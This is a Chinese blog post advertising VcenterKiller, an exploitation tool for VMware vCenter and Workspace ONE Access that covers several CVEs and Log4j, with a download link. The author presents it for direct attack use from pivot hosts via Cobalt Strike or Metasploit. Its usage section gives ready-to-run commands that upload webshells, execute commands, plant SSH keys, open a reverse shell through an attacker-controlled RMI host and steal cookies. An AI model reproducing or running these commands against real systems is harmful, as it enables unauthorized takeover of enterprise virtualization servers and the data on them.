Vcenter综合利用工具-VcenterKiller,附下载链接。

于 2024-09-30 16:06:35 发布
阅读量419 收藏 3
点赞数 3
分类专栏: # Vcenter 文章标签: vcenter 漏洞利用 vmware web安全 vcenter漏洞 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_87438300/article/details/142658793
版权

一款针对Vcenter的综合利用工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005、One Access的CVE-2022-22954、CVE-2022-22972/31656以及log4j,提供一键上传webshell,命令执行或者上传公钥使用SSH免密连接

1、下载链接

VcenterKiller下载:VcenterKiller下载

在这里插入图片描述

2.它是什么

一款针对Vcenter的综合验证工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005,提供一键上传webshell,命令执行或者上传公钥并使用SSH连接的功能,以及针对Apache Log4j CVE-2021-44228漏洞在Vcenter上的检测以及利用,比如命令执行并获取回显(需要一个ldap恶意服务器),现在不需要另外启动ldap服务器了,我根据jndi-injection工具手搓了一个利用方式,Vcenter使用的中间件是Tomcat,直接使用TomcatBypass的利用链就行了。

3.它的定位

一般Vcenter都放在内网,并且漏洞特征也都是烂大街,像什么fscan啦一扫就出来了,那么VcenterKiller就不是用来检测目标是否存在漏洞的,而是直接尝试利用,一般通过CS/MSF在跳板上来执行,所以去掉了其余花里胡哨的输出。

为什么用GO,因为Python写起来方便但是用起来很蛋疼,各种依赖库,并且编译出来体积太大,C#没法跨平台,写到一半扔了。

4.使用方法

go build -o main.exe

./main.exe -u https://192.168.1.1 -m 21985 -c whoami
./main.exe -u https://192.168.1.1 -m 22005 -f test.jsp
./main.exe -u https://192.168.1.1 -m 21972 -f test.jsp
./main.exe -u https://192.168.1.1 -m 21972 -f id_rsa.pub -t ssh //传公钥
./main.exe -u https://192.168.1.1 -m 21985 -t rshell -r rmi://xx.xx.xx.xx:1099/xx
./main.exe -u https://192.168.1.1 -m log4center -t scan // scan log4j
./main.exe -u https://192.168.1.1 -m log4center -t exec -r ldap://xx.xx.xx.xx:1389 -c whoami //也可以不指定ldap服务
./main.exe -u https://xx.xx.com -m 22954 whoami
./main.exe -u https://xx.xx.com -m 22972 //get cookie
./main.exe -u https://xx.xx.com -m 31656 //If CVE-2022-22972不能用就换CVE-2022-31656
白帽子黑客SuperherRo
关注
专栏目录
Vcenter综合渗透利用工具包 - Vcenter Comprehensive Penetration and Exploit
02-06
Vcenter Comprehensive Penetration and Exploit Toolkit 是一个专为Vcenter设计的安全评估和渗透测试工具集。这个工具包基于Python编程语言,旨在帮助安全专家和IT管理员检测Vcenter环境中的潜在脆弱性,从而增强其...
Vcenter综合利用工具-VcenterKiller
siu~
08-17 433
一款针对Vcenter综合利用工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005、One Access的CVE-2022-22954、CVE-2022-22972/31656以及log4j,提供一键上传webshell,命令执行或者上传公钥使用SSH免密连接
漏洞情报 | VMware vCenter Server 远程代码执行漏洞(CVE-2021-21985)
爱国小白帽
05-28 5242
点击上方 订阅话题 第一时间了解漏洞威胁 0x01 漏洞描述 VMware vCenter ServerVMware虚拟化管理平台,广泛的应用于企业私有云内网中。通过使用vCenter,管理员可以轻松的管理上百台虚拟化环境 。 2021年5月26日,360漏洞云监测到VMware官网发布安全公告。攻击者使用漏洞(CVE-2021-21985)可构造恶意请求,通过vCenter中默认开启的Virtual SAN Health Check插件造成远程代码执行漏洞。360漏洞云已经成功复现该漏洞。 0x02
vcenter综合利用总结
网络安全。
01-12 1926
ESXi:安装在实体服务器上,其实是个linux内核的操作系统,官方的说法是有自己专利的一个内核,不属于以往任何现有的产品。只有安装了ESXi以后你才能在上面创建虚拟机。你可以理解成在你的台式机上装的vmware workstation,只不过ESXi不用运行在操作系统上(因为本身就是操作系统)而为虚拟机直接调用硬件资源。vCenter:就是个管理软件,用来管理虚拟机和实体机,比如通过vCenter监控虚拟运行情况、创建虚拟机、调整虚拟机资源、迁移虚拟机等等。
(复现)CVE-2021-21985 Vmware vcenter远程代码执行RCE
daxi0ng的博客
06-30 4845
0x00 简介 vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心,可从单一控制点统一管理数据中心的所有 vSphere 主机和虚拟机,使得 IT 管理员能够提高控制能力,简化入场任务,并降低 IT 环境的管理复杂性与成本。 0x01 漏洞概述 该漏洞由于vCenter Server默认启用的插件Virtual SAN Heal...
推荐开源项目:VcenterKiller - 精准打击Vcenter安全漏洞
gitblog_00097的博客
05-14 467
推荐开源项目:VcenterKiller - 精准打击Vcenter安全漏洞 VcenterKiller一款针对Vcenter综合利用工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005、One Access的CVE-2022-22954、CVE-2022-22972/31656以及log4j,提供一键上传webshell,命令执行或...
vSphere-vCenter-Esxi-Vmware虚拟机管理工具,可以连接到任何vCenter机器进行批量创建主机等操作
09-29
vSphere-vCenter-Esxi-Vmware虚拟机管理工具,可以连接到任何vCenter机器进行批量创建主机,批量关机,批量开机,批量重启,批量删除释放等操作。后端接口Django开发,用户界面易语言开发。
vmware-vcenter 6.5 -vcsa linux版本下载
11-02
需要注意的是,为了确保下载安全性和完整性,请确认链接的有效性以及是否来自官方或可信来源。 2. **系统要求**:在下载前,请确保目标系统满足以下最低要求: - CPU:2个vCPU(至少一个物理核心) - 内存:8GB ...
VMware-vCenter-Server-Appliance-6.5.0.14000-7515524.txt
09-20
VMware-vCenter-Server-Appliance-6.5.0.14000-7515524-updaterepo
vmware vcenter6.0u3百度云盘下载链接
02-21
txt中包含了两个下载链接,一个是windows版的VMware-VIMSetup-all-6.0.0-update3-8874690.iso,另一个是VMware-viclient-all-6.0.0-5112508,链接真实有效,欢迎下载
干货分享 | VMware vCenter漏洞实战利用总结
mingyqf的博客
01-31 2267
零队 [EchoSec](javascript:void(0)😉收录于合集#vmware1个文章来源:零队**前言**Vcenter一般指VMware vCenter Server,其提供了一个可伸缩、可扩展的平台,为虚拟化管理奠定了基础,可集中管理VMware vSphere环境,与其他管理平台相比,极大地提高了IT管理员对虚拟环境的控制,Vcenter可以使管理员从一个位置深入了解虚拟基础架构的集群、主机、虚拟机、存储、客户操作系统和其他关键组件等所有信息。利用思路。
cve-2021-21985漏洞复现
whojoe的博客
06-09 6641
cve-2021-21985漏洞复现受影响的版本:漏洞复现后续利用参考文章 受影响的版本: VMware vCenter Server 7.0系列 < 7.0.U2b VMware vCenter Server 6.7系列 < 6.7.U3n VMware vCenter Server 6.5系列 < 6.5 U3p VMware Cloud Foundation 4.x 系列 < 4.2.1 VMware Cloud Foundation 4.x 系列 < 3.10.2.1
vCenter 漏洞利用总结
内心不种满鲜花就会长满杂草
07-24 3270
VMware vCenterVMware公司推出的集中化虚拟化管理平台。它是VMware vSphere虚拟化解决方案的核心组件之一。vCenter的主要功能是管理和监控整个vSphere虚拟化基础架构,包括多个ESXi主机和虚拟机。vSpherevSphere是VMware的虚拟化平台的总称,它是一套完整的虚拟化解决方案,包括了多个组件和功能,用于构建和管理虚拟化环境。
Vcenter实战利用方式总结
weixin_46239998的博客
07-12 444
在实际情况中也碰到使用 MSSQL 数据库的情况,这时候直接使用 navicat 进行连接,搜索。默认是postgresql数据库,只能在vCenter服务器本地登录,执行语句查询ESXI的密码。访问上面的路径,如果404,则代表不存在漏洞,如果405 则可能存在漏洞。比较快的一种方法,但是修改之后无法获取原来的密码,管理员会发现密码被改。
CVE-2021-21985 漏洞复现
HEAVEN569的博客
08-12 3422
CVE-2021-21985 漏洞复现 1.漏洞简介 该漏洞存在于vSphere Client(HTML5)中,由于vCenter Server中默认启用的Virtual SAN Health Check插件缺乏输入验证,拥有443端口网络访问权限的攻击者可以利用此漏洞在承载vCenter Server的操作系统上远程执行任意命令。 需要注意的是,Virtual SAN Health Check插件在所有vCenter Server中都默认启用,任何能够通过网络访问vCenter Server的未经身份验证
CVE-2021-21985 vCenter复现RCE
tesla889的博客
01-10 753
VMware在5月25日发布了CVE-2021-21985vCenter远程代码执行漏洞通告及修复版本,该漏洞允许未经身份认证的用户调用任意Bean里的任意方法,当调用一个恶意方法时会导致任意代码执行。
推荐文章:VcenterKiller - 强大的VCenter安全验证神器
gitblog_00645的博客
08-09 405
推荐文章:VcenterKiller - 强大的VCenter安全验证神器 VcenterKiller一款针对Vcenter综合利用工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005、One Access的CVE-2022-22954、CVE-2022-22972/31656以及log4j,提供一键上传webshell,命令执行或者...
Vcenter综合渗透利用工具包-VcenterKit
siu~
10-07 591
Vcenter综合渗透利用工具
推荐使用CVE-2021-21985漏洞检测与利用工具
最新发布
gitblog_00250的博客
08-28 382
推荐使用CVE-2021-21985漏洞检测与利用工具 CVE-2021-21985_PoC项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2021-21985_PoC 项目介绍 CVE-2021-21985是一个针对VMware vSphere Client(HTML5)的远程代码执行漏洞。该漏洞源于Virtual SAN Health Check插件中缺...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值